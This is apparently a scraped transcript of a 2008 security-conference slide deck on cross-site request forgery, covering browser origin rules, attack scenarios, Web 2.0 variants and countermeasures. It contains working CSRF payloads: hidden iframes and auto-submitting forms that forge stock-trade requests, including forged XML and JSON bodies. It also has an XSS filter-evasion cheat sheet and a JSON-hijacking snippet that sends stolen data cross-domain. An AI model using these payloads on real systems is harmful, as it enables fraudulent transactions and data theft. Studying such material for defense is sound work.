Successfully reported this slideshow.

More Related Content

Related Books

Free with a 14 day trial from Scribd

See all

[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web

  1. 1. Session J7 Demo CSRF: The Biggest Little Vulnerability on the Web
  2. 2. Who Am I? Founder & Director – Blueinfy Solutions Pvt. Ltd. (Brief) – Past experience – Net Square, Chase, IBM & Foundstone Interest – Web security research Published research – Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. – Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. – Advisories - .Net, Java servers etc. Books (Author) – Web 2.0 Security – Defending Ajax, RIA and SOA – Hacking Web Services – Web Hacking © Blueinfy Solutions Pvt. Ltd.
  3. 3. Both real and possible It all can happen while you are browsing without your consent – Bank account transfer – Buy call for stocks – Password changes on your email account – Placing an order on your online auction site – ….more…. © Blueinfy Solutions Pvt. Ltd.
  4. 4. Myth… We have authentication in place We do proper session management We are over SSL and entertain just POST requests We use secure browser © Blueinfy Solutions Pvt. Ltd.
  5. 5. How? All popular browsers can make Cross Domain Calls Browsers do replay cookies to same domain Browser manages authentications as well CSRF © Blueinfy Solutions Pvt. Ltd.
  6. 6. Demo Quick look at the case of Stock trading portal Adding stocks to portfolio ☺ © Blueinfy Solutions Pvt. Ltd.
  7. 7. Agenda State of Application Security and Role of CSRF CSRF Introduction and Cross Domain Calls CSRF attack CSRF and Web 2.0 Defense against CSRF Conclusion We will have concepts, examples and demos © Blueinfy Solutions Pvt. Ltd.
  8. 8. Application Security State CSRF on the rise © Blueinfy Solutions Pvt. Ltd.
  9. 9. Hacks & Attacks © Blueinfy Solutions Pvt. Ltd.
  10. 10. Attack vectors and types Source: Web Application Security Consortium (WASC) © Blueinfy Solutions Pvt. Ltd.
  11. 11. Trends… Server side hacking is getting tougher with central defense Attacks on client side – XSS and CSRF Helps in identity stealing Both exploits and framework are available © Blueinfy Solutions Pvt. Ltd.
  12. 12. CSRF – “Sleeping giant” “Sleeping giant is still a giant” Entered into OWASP top 10 and Mitre Corp.'s Common Vulnerability and Exposures (CVE) list XSS and CSRF can be twin evils Having XSS one gets CSRF free any way CSRF defense is difficult © Blueinfy Solutions Pvt. Ltd.
  13. 13. Real Cases and Attacks © Blueinfy Solutions Pvt. Ltd.
  14. 14. Web 2.0 – Adding fuel to the fire 80% of companies are investing in Web Services as part of their Web 2.0 initiative (McKinsey 2007 Global Survey) By the end of 2007, 30 percent of large companies have some kind of Web 2.0-based business initiative up and running. (Gartner) 2008. Web Services or Service- Oriented Architecture (SOA) would surge ahead. (Gartner) © Blueinfy Solutions Pvt. Ltd.
  15. 15. Root cause of Vulnerabilities CSRF is somewhere in-between CSI Security Survey : Vulnerability Distribution Protocol? Browser? misconfiguration, Programming? other problems 36% programming errors 64% misconfiguration, other problems programming errors © Blueinfy Solutions Pvt. Ltd.
  16. 16. CSRF – Basics © Blueinfy Solutions Pvt. Ltd.
  17. 17. CSRF Cross Site Request Forgery (CSRF) also known as XSRF Several other names to same vector like – “sea surf”, session ridding, One click attack etc… Results are same © Blueinfy Solutions Pvt. Ltd.
  18. 18. CSRF scenario Login request Web app Web app DB Web Web Client Web app Authenticated Server SESSID=190832mkidw DB Session id given Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
  19. 19. CSRF scenario Transaction page Web app Web app DB Web Web Client Web app Transaction done Server DB SESSID=190832mkidw On session id Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
  20. 20. CSRF scenario Malicious Site Browse Load a Web app page Web app DB Web Web Client Web app Server SESSID=190832mkidw DB Web app Banking Application © Blueinfy Solutions Pvt. Ltd.
  21. 21. CSRF scenario Malicious Site Browse Load a page Web app Forced Web app DB Web Web Client Transaction page Web app Server DB SESSID=190832mkidw Transaction done Web app on session id Banking Application © Blueinfy Solutions Pvt. Ltd.
  22. 22. Cross Domain Call Why? – Cross Domain Calls work What about Same Origin Policy (SOP)? Is it a bypass to it? – For CSRF success. © Blueinfy Solutions Pvt. Ltd.
  23. 23. Cross Domain Access and Same Origin Policy (SOP) © Blueinfy Solutions Pvt. Ltd.
  24. 24. Cross Domain Browser & Cross domain access – an issue How to access cross domain information from the browser? Browsers are following same origin policy. This policy protect browser from security and privacy access Ajax and RIA brought this issue on front end It is important for them to access cross domain resources. © Blueinfy Solutions Pvt. Ltd.
  25. 25. Same Origin Policy Same origin policy is followed by all browsers The policy dates from Netscape Navigator 2.0. Two pages to have the same origin if the protocol, port (if given), and host are the same for both pages. document.domain – DOM reference point © Blueinfy Solutions Pvt. Ltd.
  26. 26. Example [Success] [Fail- protocol] [Fail- port] [Fail-host] Origin check is there by comparing with document.domain – Part of DOM © Blueinfy Solutions Pvt. Ltd.
  27. 27. Should not work Login (user/pass) Trading Site Client Authentication Cookie Trading Page X News Site © Blueinfy Solutions Pvt. Ltd.
  28. 28. Request generation IMG SRC <img src=quot;http://host/?commandquot;> SCRIPT SRC <script src=quot;http://host/?commandquot;> IFRAME SRC <iframe src=quot;http://host/?commandquot;> © Blueinfy Solutions Pvt. Ltd.
  29. 29. Request generation 'Image' Object <script> var foo = new Image(); foo.src = quot;http://host/?commandquot;; </script> © Blueinfy Solutions Pvt. Ltd.
  30. 30. Request generation It is possible to generate POST as well Form can be build dynamically and button click from JavaScript is possible <script type=quot;text/javascriptquot; language=quot;JavaScriptquot;>; </script> © Blueinfy Solutions Pvt. Ltd.
  31. 31. CSRF Attack © Blueinfy Solutions Pvt. Ltd.
  32. 32. Attacking with CSRF © Blueinfy Solutions Pvt. Ltd.
  33. 33. Logging in POST /trade/login.aspx HTTP/1.1 HTTP/1.x 200 OK Host: Date: Mon, 23 Jul 2007 04:10:29 GMT User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: Gecko/20070713 Firefox/ Server: Microsoft-IIS/6.0 Accept: X-Powered-By: ASP.NET text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,tex X-AspNet-Version: 2.0.50727 t/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Set-Cookie: Accept-Encoding: gzip,deflate ASP.NET_SessionId=mvoik245bzlfom55dxjsxoe1; Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 path=/; Keep-Alive: 300 Cache-Control: private Connection: keep-alive Content-Type: text/html; charset=utf-8 Referer: Content-Type: application/x-www-form-urlencoded Content-Length: 34 user=rob&pass=iamrob&Submit=Submit © Blueinfy Solutions Pvt. Ltd.
  34. 34. Placing an order GET /trade/buy.aspx?symbol=MSFT&units=75&Submit=Submit HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: Gecko/20070713 Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0. 8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: Cookie: ASP.NET_SessionId= mvoik245bzlfom55dxjsxoe1 © Blueinfy Solutions Pvt. Ltd.
  35. 35. Victim on another site <html> <head></head> <body> Welcome to our auction portal. We have some great products for which you can bid. <br> Enjoy! <iframe src='‘ id='xsfr' name='CSRF' style=quot;width:0px; height:0px; border: 0pxquot;> </body> </html> GET /trade/buy.aspx?symbol=GOOG&units=50 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: Gecko/20070713 Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai n;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: Cookie: ASP.NET_SessionId=x5r1a355eppt5k454kjmx245 © Blueinfy Solutions Pvt. Ltd.
  36. 36. Victim with POST request <FORM NAME=quot;buyquot; action=quot;./buy.aspxquot; METHOD=quot;GETquot;> <input type=quot;hiddenquot; name=quot;symbolquot; value=quot;GOOGquot;> <input type=quot;hiddenquot; name=quot;unitsquot; value=quot;50quot;> </FORM> <script>;</script> POST /trade/buy.aspx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv: Gecko/20070725 Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0 .8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: Content-Type: application/x-www-form-urlencoded Content-Length: 20 symbol=GOOG&units=50 © Blueinfy Solutions Pvt. Ltd.
  37. 37. Obfuscation to bypass controls ';alert(String.fromCharCode(8 8,83,83))//';alert(String.fromC harCode(88,83,83))//quot;;alert(St ring.fromCharCode(88,83,83) )//quot;;alert(String.fromCharCod e(88,83,83))//-- ></SCRIPT>quot;>'><SCRIPT>al ert(String.fromCharCode(88,8 3,83))</SCRIPT> © Blueinfy Solutions Pvt. Ltd.
  38. 38. Obfuscation to bypass controls <SCRIPT SRC=http://url/xss.js></SCRIPT> <IMG SRC=quot;javascript:alert('XSS');quot;> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;) > <IMG SRC=`javascript:alert(quot;XSSquot;)`> Image tag malformed - <IMG quot;quot;quot;><SCRIPT>alert(quot;XSSquot;)</SCRIPT>quot; > © Blueinfy Solutions Pvt. Ltd.
  39. 39. Obfuscation to bypass controls <IMG SRC=javascript:alert(String.fromCharC ode(88,83,83))> Unicode encoding - <IMG SRC=javas cript&#58 ;alert&#4 0;'XSS')> © Blueinfy Solutions Pvt. Ltd.
  40. 40. Obfuscation to bypass controls UTF-8 - <IMG SRC=&#0000106&#0000097&#000011 8&#0000097&#0000115&#0000099&#0 000114&#0000105&#0000112&#00001 16&#0000058&#0000097&#0000108&# 0000101&#0000114&#0000116&#0000 040&#0000039&#0000088&#0000083& #0000083&#0000039&#0000041> © Blueinfy Solutions Pvt. Ltd.
  41. 41. Obfuscation to bypass controls Hex - <IMG SRC=&#x6A&#x61&#x76&#x61&#x73& #x63&#x72&#x69&#x70&#x74&#x3A&# x61&#x6C&#x65&#x72&#x74&#x28&#x 27&#x58&#x53&#x53&#x27&#x29> XSS breakup - <IMG SRC=quot;jav ascript:alert('XSS');quot;> <IMG SRC=quot;jav ascript:alert('XSS');quot;> © Blueinfy Solutions Pvt. Ltd.
  42. 42. CSRF and Web 2.0 © Blueinfy Solutions Pvt. Ltd.
  43. 43. Web 2.0 and CSRF Web 2.0 applications can be vulnerable to different type of CSRF It can be with different structures One needs to look at it as well © Blueinfy Solutions Pvt. Ltd.
  44. 44. Architecture © Blueinfy Solutions Pvt. Ltd.
  45. 45. Architecture - Layers Browser Structures Protocols Server-Side JSON-RPC Ajax Flash / RIA Services XML REST HTML/CSS JavaScript SaaS JSON XML-RPC Widget DOM Open APIs SOAP HTTP(S) © Blueinfy Solutions Pvt. Ltd.
  46. 46. Web 2.0 Changes Application Infrastructure Vector Web 1.0 Web 2.0 Protocols HTTP & HTTPS SOAP, XML-RPC, REST etc. over HTTP & HTTPS Information HTML transfer XML, JSON, JS Objects etc. structures Communication Synchronous Asynchronous & Cross methods Postback domains Refresh and Redirect (proxy) Information sharing Single place Multiple sources (Urge for information (No integrated urge for integration) information platform) © Blueinfy Solutions Pvt. Ltd.
  47. 47. Ajax/RIA call Asynchronous JavaScript and XML HTML / CSS / Flash Database / Resource JS / DOM XML / Middleware / Text XMLHttpRequest (XHR) Web Server Asynchronous over HTTP(S) © Blueinfy Solutions Pvt. Ltd.
  48. 48. Web 2.0 Structures & Cross Domain Calls © Blueinfy Solutions Pvt. Ltd.
  49. 49. Application Structures Ajax running with various different structures Developers are adding various different calls and methods for it JavaScript can talk with back end sources Mashups application talking with various sources It has significant security impact. JSON, Array, JS-Object etc Identifying and Discovery of structures and CSRF © Blueinfy Solutions Pvt. Ltd.
  50. 50. CSRF with various streams JSON XML JS-Script JS-Object JS-Array © Blueinfy Solutions Pvt. Ltd.
  51. 51. Addressing Cross Domain Calls – CSRF opening Cross Domain calls are very important for Web 2.0 applications. – Proxy to talk with cross domain – Callback implementation to fetch them – Flash via crossdomain.xml These are types of bypass and can have security implications Source of the information – key! © Blueinfy Solutions Pvt. Ltd.
  52. 52. Cross Domain with proxy © Blueinfy Solutions Pvt. Ltd.
  53. 53. Callback Implementation • Portals like yahoo and google are supporting this. • Possible to bypass the SOP and make Cross Domain Calls • Security at stake [Browser layer] © Blueinfy Solutions Pvt. Ltd.
  54. 54. CSRF for 2.0 © Blueinfy Solutions Pvt. Ltd.
  55. 55. Cross Site Request Forgery (CSRF) What is different with Web 2.0 – Is it possible to do CSRF to XML stream – How? – It will be POST hitting the XML processing resources like Web Services – JSON CSRF is also possible – Interesting check to make against application and Web 2.0 resources © Blueinfy Solutions Pvt. Ltd.
  56. 56. One Way CSRF Scenario © Blueinfy Solutions Pvt. Ltd.
  57. 57. One Way CSRF Scenario © Blueinfy Solutions Pvt. Ltd.
  58. 58. One Way CSRF Scenario © Blueinfy Solutions Pvt. Ltd.
  59. 59. One Way CSRF Scenario © Blueinfy Solutions Pvt. Ltd.
  60. 60. One-Way CSRF © Blueinfy Solutions Pvt. Ltd.
  61. 61. One-Way CSRF <html> <body> <FORM NAME=quot;buyquot; ENCTYPE=quot;text/plainquot; action=quot; emquot; METHOD=quot;POSTquot;> <input type=quot;hiddenquot; name='<?xml version' value='quot;1.0quot;?><methodCall><methodName>sto</methodName><params><param><val ue><string>MSFT</string></value></param><p aram><value><double>26</double></value></ param></params></methodCall>'> </FORM> <script>;</script> </body> </html> © Blueinfy Solutions Pvt. Ltd.
  62. 62. Forcing XML Splitting XML stream in the form. Possible through XForms as well. Similar techniques is applicable to JSON as well. © Blueinfy Solutions Pvt. Ltd.
  63. 63. Similar with JSON {quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;nonequot;} <FORM NAME=quot;buyquot; ENCTYPE=quot;text/plainquot; action=quot;; METHOD=quot;POSTquot;> <input type=quot;hiddenquot; name='{quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;' value='noquot;}'> </FORM> <script>;</script> POST /trade/ajax-buy/buy.aspx HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv: Gecko/20070725 Firefox/ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: Content-Type: text/plain Content-Length: 53 {quot;symbolquot;: quot;MSFTquot;, quot;unitsquot;: quot;20quot;, quot;commentquot;: quot;=noquot;} © Blueinfy Solutions Pvt. Ltd.
  64. 64. Two-Way CSRF One-Way – Just making forceful request. Two-Way – Reading the data coming from the target – May be getting hold onto important information – profile, statements, numbers etc. – Is it possible with JSON/XML © Blueinfy Solutions Pvt. Ltd.
  65. 65. Two-Way CSRF © Blueinfy Solutions Pvt. Ltd.
  66. 66. Two-Way CSRF © Blueinfy Solutions Pvt. Ltd.
  67. 67. Two-Way CSRF Application is serving various streams like – JSON, JS- Object, Array etc. © Blueinfy Solutions Pvt. Ltd.
  68. 68. Two-Way CSRF Attacker page can make cross domain request using SCRIPT (firefox) Following code can overload the array stream. function Array() { var obj = this; var index = 0; for(j=0;j<4;j++){ obj[index++] setter = spoof; } } function spoof(x){ send(x.toString()); } © Blueinfy Solutions Pvt. Ltd.
  69. 69. Two-Way CSRF © Blueinfy Solutions Pvt. Ltd.
  70. 70. Two-Way CSRF It is possible to overload these objects. Reading and sending to cross domain possible. Opens up two way channel for an attacker. Web 2.0 streams are vulnerable to these attacks. © Blueinfy Solutions Pvt. Ltd.
  71. 71. Scenario JSON Vulnerable stream coming Blog feed through proxy Posting to the site [Malicious code] proxy Web app DB attacker Web Server Web app JSON Web Client CSRF Target © Blueinfy Solutions Pvt. Ltd.
  72. 72. Web 2.0 Components There are various other components for Web 2.0 Applications – Can serve as CSRF payload – RSS feeds – Mashups – Widgets – Blogs – Flash based components © Blueinfy Solutions Pvt. Ltd.
  73. 73. RSS feeds RSS feeds coming into application from various un- trusted sources. Feed readers are part of 2.0 Applications. Vulnerable to XSS or CSRF. Malicious code can be executed on the browser. Several vulnerabilities reported. © Blueinfy Solutions Pvt. Ltd.
  74. 74. RSS feeds © Blueinfy Solutions Pvt. Ltd.
  75. 75. Mashups API exposure for Mashup supplier application. Cross Domain access by callback may cause CSRF. Mashup application can be man in the middle so can’t trust or must be trusted one. © Blueinfy Solutions Pvt. Ltd.
  76. 76. Widgets/Gadgets DOM sharing model can cause many security issues. One widget can change information on another widget – possible. CSRF injection through widget code. © Blueinfy Solutions Pvt. Ltd.
  77. 77. Blogs Blogs are common to Web 2.0 applications. Many applications are plugging third party blogs One needs to check these blogs – CSRF is common with blogging applications. © Blueinfy Solutions Pvt. Ltd.
  78. 78. Defense against CSRF © Blueinfy Solutions Pvt. Ltd.
  79. 79. Unique tokens URL tokens – dynamically generated Form tokens – hidden <input type=quot;submitquot; class=quot;submitquot; value=quot;Loginquot; /> <input type=quot;hiddenquot; name=quot;formTokenquot; value=quot;d5cb8550af604bfb103dae89445fde69quot;> © Blueinfy Solutions Pvt. Ltd.
  80. 80. Captchas Can have image/text based captchas for important forms This will add protection against CSRFs Banking and financial applications can add several transaction ids for users © Blueinfy Solutions Pvt. Ltd.
  81. 81. Referer check Checking referrer to identify from where requests are coming Same domain or request from specific resource should be entertained Referer: © Blueinfy Solutions Pvt. Ltd.
  82. 82. Session and Logout Client side – self defense – Logout after activities at earliest – Doing banking and other critical operations from separate browser – Browsing from VM On server side session duration should be small © Blueinfy Solutions Pvt. Ltd.
  83. 83. Web 2.0 Specific Server Side Checks – Check for client’s content-type. – XHR calls – xml/application. – Native calls – text/html. – Filtering is possible on it. Client Side Checks – Stream can be started and terminated by /* or any predefined characters. – Client can remove them before injecting to DOM. © Blueinfy Solutions Pvt. Ltd.
  84. 84. Warning Discussed countermeasures are not bullet proof but raise the bar There is no perfect security for CSRF – browsers are designed and work that allows CSR XSS on the site gives a leverage for CSRF - No XSS! © Blueinfy Solutions Pvt. Ltd.
  85. 85. Conclusion CSRF is indeed a sleeping giant Understanding is important and need to put countermeasures at code level No full proof defense available but there are ways to protect applications or part of applications Web 2.0 – adds new dimension to CSRF © Blueinfy Solutions Pvt. Ltd.
  86. 86. Questions © Blueinfy Solutions Pvt. Ltd.